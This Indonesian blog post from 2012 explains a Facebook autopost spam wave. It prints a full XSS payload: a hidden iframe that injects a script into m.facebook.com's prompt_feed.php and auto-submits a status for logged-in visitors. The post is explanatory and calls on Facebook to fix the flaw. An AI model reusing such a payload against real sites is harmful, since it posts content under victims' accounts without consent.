Skip to content

emka.web.id

Menu
  • Home
  • Indeks Artikel
  • Tutorial
  • Tentang Kami
Menu

Inilah teknik XSS autospam Facebook dengan pemendek URL itu!

Posted on November 16, 2012 by Syauqi Wiryahasana
Facebook kembali harus segera berbenah, edisi mobile dari facebook (m.facebook.com) sangat rentan untuk dieksploitasi. Contoh terbaru setelah wabah autolike facebook, kini beredar wabah autopost status di Facebook. Teknik yang dipakai oleh mereka yang 'iseng' ini adalah teknik XSS (cross site scripting), sebuah teknik injeksi sebuah script ke dalam suatu halaman web yang sedang dilihat oleh orang lain (pengguna lain). Wabah autopost status facebook ini mendera pengguna facebook karena mereka mengunjungi URL yang sengaja menempatkan script XSS tersebut. Kelemahan yang diserang oleh script itu adalah file prompt_feed.php milik m.facebook.com. Contohnya: [sourcecode language="php" wraplines="true"] <iframe id="CrazyDaVinci" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php? display=wap&user_message_prompt=' <script>window.onload=function(){document.forms[0].message.value='Baru saja berkunjung ke blog https://cms.emka.web.id. Belajar seputar PHP dan Linux disana! '; document.forms[0].submit();}</script>"></iframe> [/sourcecode] Contoh script diatas, menaruh sebuah iframe di halaman web yang mempost variabel 'Baru saja berkunjung ke blog https://cms.emka.web.id' ke alamat http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt= yang celakanya tidak difilter maupun diverifikasi. Akibatnya, variabel ini akan ditulis sebagai status FB baru. Hal ini hanya mungkin terjadi bila masih halaman ini masih dimuat dalam satu window aplikasi dan dalam kondisi login FB. Semoga Facebook cepat memperbaikinya!
Seedbacklink

Recent Posts

TENTANG EMKA.WEB>ID

EMKA.WEB.ID adalah blog seputar teknologi informasi, edukasi dan ke-NU-an yang hadir sejak tahun 2011. Kontak: kontak@emka.web.id.

©2024 emka.web.id Proudly powered by wpStatically